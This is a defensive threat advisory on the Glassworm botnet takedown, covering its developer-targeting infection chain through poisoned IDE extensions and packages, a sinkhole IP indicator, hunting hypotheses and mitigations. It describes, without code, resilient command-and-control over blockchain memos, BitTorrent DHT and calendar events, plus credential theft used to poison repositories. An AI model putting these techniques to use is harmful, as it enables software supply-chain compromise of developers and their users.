Disrupting Glassworm: Inside CrowdStrike’s Takedown of a Developer-Targeting Botnet

What Happened

Security researchers have successfully taken down a global cyber threat known as Glassworm. This malicious network specifically targeted software developers by hiding viruses in popular coding tools and software packages. By compromising developers, the attackers aimed to sneak malicious code into the software that everyday businesses and consumers use. Organizations should check their network logs for connections to a specific sinkhole IP address provided by researchers to see if their developers were compromised.

Key Takeaways

• CrowdStrike, Google, and Shadowserver successfully dismantled the Glassworm botnet by simultaneously disrupting its four resilient C2 channels.
• Glassworm specifically targets software developers via trojanized VSCode extensions, malicious npm/Python packages, and poisoned GitHub repositories.
• The botnet's C2 architecture utilized Solana blockchain memos, BitTorrent DHT, Google Calendar event titles, and direct VPS connections for extreme resilience.
• Infected machines now beacon to a CrowdStrike-controlled sinkhole IP (164.92.88.210), which serves as a high-fidelity indicator of compromise.

Affected Systems

• Windows
• macOS
• Linux
• VSCode
• Cursor
• Positron
• Windsurf
• VSCodium
• Node.js environments
• Python environments

Attack Chain

The attack begins with initial access via trojanized IDE extensions or compromised npm/Python packages executing malicious scripts during installation. A first-stage loader is executed, which retrieves the second-stage payload (GlasswormRAT) using a highly resilient C2 resolution process involving the Solana blockchain, BitTorrent DHT, or Google Calendar. Once established, the RAT harvests developer credentials and uses them to poison additional GitHub repositories, perpetuating the supply chain compromise.

Detection Availability

• YARA Rules: Yes
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No
• Platforms: CrowdStrike

The article provides two YARA rules (CrowdStrike_GlasswormRat_01 and CrowdStrike_GlasswormDownloader_01) to identify the GlasswormRAT script and the obfuscated Python installer variant.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions can monitor process executions from package managers (npm, pip) and IDEs, as well as detect the execution of obfuscated Python scripts or Node.js payloads. Network Visibility: High — Infected hosts are currently beaconing to a known sinkhole IP address, making network-based detection highly effective for identifying existing compromises. Detection Difficulty: Moderate — While the initial infection via supply chain is hard to detect proactively, the current sinkholed state makes identifying existing infections straightforward via network logs.

Required Log Sources

• Network flow logs
• DNS query logs
• Process creation logs (Event ID 4688 / Sysmon Event ID 1)
• File creation logs

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Consider hunting for unexpected outbound network connections originating from developer tools (e.g., VSCode, Node.js, Python) to unusual external IPs or known sinkhole infrastructure.	Network flow logs, EDR network events	Command and Control	Low
Evaluate whether package manager processes (npm, pip) are spawning suspicious child processes, such as obfuscated scripts or unexpected network utilities, during dependency installation.	Process creation logs	Execution	Medium

Control Gaps

• Lack of strict egress filtering for developer workstations
• Implicit trust in open-source package registries and IDE extension marketplaces

Key Behavioral Indicators

• Connections to the known sinkhole IP
• IDE extensions executing unusual child processes
• Python or Node.js executing heavily obfuscated code from temporary directories

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Verify against your organization's incident response runbook and team escalation paths before acting.
• Search network telemetry and firewall logs for any outbound connections to 164.92.88.210 to identify compromised developer workstations.
• If your EDR supports it, consider isolating any hosts found communicating with the sinkhole IP pending a full forensic investigation.
• Consider deploying the provided YARA rules to endpoint scanning tools to identify dormant Glassworm payloads.

Infrastructure Hardening

• Evaluate whether egress network filtering can be tightened for developer VLANs to restrict outbound connections to only approved repositories and services.
• Consider implementing private package registries and dependency proxy caches to scan and control open-source packages before they reach developer endpoints.

User Protection

• If applicable, restrict the installation of IDE extensions to an approved list of vetted tools.
• Enforce phishing-resistant MFA for all developer accounts, including GitHub, cloud platforms, and internal CI/CD systems.

Security Awareness

• Educate development teams on the risks of typosquatting and malicious packages in open-source registries.
• Train developers to review the permissions and publishers of IDE extensions before installation.

MITRE ATT&CK Mapping

• T1195.001 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools
• T1059 - Command and Scripting Interpreter
• T1102 - Web Service
• T1008 - Fallback Channels
• T1568 - Dynamic Resolution
• T1078 - Valid Accounts